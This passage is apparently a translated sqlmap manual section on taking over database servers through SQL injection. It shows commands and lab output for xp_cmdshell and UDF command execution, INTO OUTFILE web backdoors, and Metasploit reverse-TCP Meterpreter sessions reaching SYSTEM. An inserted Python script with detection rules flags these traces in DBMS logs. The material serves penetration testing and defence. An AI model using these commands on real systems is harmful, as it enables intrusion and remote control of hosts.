sqlmap Chinese Manual (14)

When the database management system is Microsoft SQL Server, sqlmap executes arbitrary commands through the stored procedure xp_cmdshell.
If xp_cmdshell is disabled (the default on SQL Server 2005 and later), sqlmap re-enables it;
if xp_cmdshell does not exist, sqlmap creates it.

When the user wants to see the standard output of the executed command, sqlmap uses one of the enumeration-capable injection techniques (blind, in-band or error-based); when the user does not want the standard output, stacked-query injection is used to execute the command.

The following example targets PostgreSQL:

  python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --os-cmd id -v 1

Part of the output is shown below:

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
'uid=104(postgres) gid=106(postgres) groups=106(postgres)'
[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can only be deleted manually

The --os-shell option emulates a shell in which arbitrary commands can be executed; like --sql-shell, this shell supports TAB completion and command history.

When stacked queries are not supported (for example PHP or ASP with MySQL as the back-end DBMS) and the database management system is MySQL, it is still possible to use the SELECT clause INTO OUTFILE to create a web backdoor in a writable directory on the web server host and execute commands through it. sqlmap supports this technique and asks the user to provide a comma-separated list of paths that may be writable directories. sqlmap supports the following server-side scripting languages:

ASP
ASP.NET
JSP
PHP

2. Out-of-band TCP connection: Meterpreter and related

Options: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path and --tmp-path

If the database management system is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the required privileges, sqlmap can establish an out-of-band TCP connection between the attacker's machine and the database server host. Depending on the user's choice, this connection can be an interactive command shell, a Meterpreter session or a graphical user interface (VNC) session.

sqlmap relies on Metasploit to generate the shellcode. There are four techniques for executing that shellcode on the database server host:

The database executes Metasploit's shellcode in memory through the user-defined function sys_bineval() created by sqlmap. Supported on MySQL and PostgreSQL. Option: --os-pwn.

Upload and execute Metasploit's stand-alone payload stager through sqlmap's own user-defined functions (sys_exec() on MySQL and PostgreSQL, xp_cmdshell() on Microsoft SQL Server). Option: --os-pwn.

Exploit the remote code execution vulnerability MS08-068. The attacker's machine must run Metasploit's smb_relay exploit, listening for connections from the target machine. This requires sqlmap to run with root privileges on Linux/Unix and the target DBMS to run with Administrator privileges on Windows. Option: --os-smbrelay.

On Microsoft SQL Server 2000 and 2005, execute Metasploit's shellcode in memory through the heap-based buffer overflow vulnerability in the stored procedure sp_replwritetovarbin (MS09-004). sqlmap has its own Data Execution Prevention bypass technique to exploit the vulnerability successfully, but it needs Metasploit to generate the shellcode that is executed once exploitation succeeds. Option: --os-bof.
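Every technique above (xp_cmdshell being re-enabled and called, the sys_exec/sys_eval/sys_bineval UDFs being created from a shared object, SELECT ... INTO OUTFILE into a web root, and calls to sp_replwritetovarbin) leaves traces in the DBMS query or audit log. As an added example, not part of this manual and not sqlmap's own code, the following Python script flags those traces in a log; the log lines, rule names and file names are constructed for illustration, and real MySQL general-log and SQL Server audit formats differ.

```python
import re
from typing import List, Tuple

# Constructed sample DBMS log lines (not from the manual or from sqlmap); the
# format is a simplified mix of a MySQL general log and a SQL Server audit.
SAMPLE_LOG = """\
2024-01-01T10:00:01 mysql Query SELECT id, name FROM users WHERE id = 1
2024-01-01T10:00:02 mysql Query SELECT 1 INTO OUTFILE '/var/www/html/tmpbxyz.php'
2024-01-01T10:00:03 mysql Query CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudf.so'
2024-01-01T10:00:04 mssql EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
2024-01-01T10:00:05 mssql EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
2024-01-01T10:00:06 mssql EXEC master..xp_cmdshell 'whoami'
2024-01-01T10:00:07 mssql SELECT name FROM sys.tables
2024-01-01T10:00:08 mysql Query SELECT sys_bineval(0x4d5a90...)
2024-01-01T10:00:09 mssql EXEC master..sp_replwritetovarbin 1, ...
"""

# Detection rules: (rule name, regex). Each maps to one technique described
# in the manual; sp_configure is how a disabled xp_cmdshell gets re-enabled.
RULES = [
    ("xp_cmdshell enabled via sp_configure",
     r"sp_configure\s*'?xp_cmdshell'?\s*,\s*1"),
    ("xp_cmdshell invoked", r"\bxp_cmdshell\b"),
    ("sqlmap-style UDF created from shared object",
     r"CREATE\s+FUNCTION\s+(sys_exec|sys_eval|sys_bineval)\b.*\bSONAME\b"),
    ("sqlmap-style UDF called", r"\b(sys_exec|sys_eval|sys_bineval)\s*\("),
    ("SELECT ... INTO OUTFILE/DUMPFILE into a web root",
     r"INTO\s+(OUTFILE|DUMPFILE)\s+'[^']*(www|htdocs|inetpub|wwwroot)[^']*'"),
    ("sp_replwritetovarbin called (MS09-004 vector)", r"\bsp_replwritetovarbin\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


def scan_dbms_log(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, rule_name, line) for every rule that fires on a line.
    Line numbers are 1-based; one line may yield several findings."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        for name, pattern in COMPILED:
            if pattern.search(line):
                findings.append((line_no, name, line.strip()))
    return findings


if __name__ == "__main__":
    for line_no, name, line in scan_dbms_log(SAMPLE_LOG):
        print(f"line {line_no}: {name}\n    {line}")
```

A hit on the UDF or sp_configure rules from an application account is a strong signal on its own, since legitimate application code rarely creates functions or changes server options; the xp_cmdshell and INTO OUTFILE rules are better correlated with the web server's access log for the same time window.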

Here is an example targeting MySQL:

python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit

[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS            : Windows .NET Server (Build 3790, Service Pack 2).
Computer      : W2K3R2
Architecture  : x86
Meterpreter   : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask    : 255.0.0.0

Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask    : 255.255.255.0

meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit

Content copyright notice: unless otherwise stated, all articles are original to this site.

When reposting, cite the source: https://www.heiqu.com/wpyxgg.html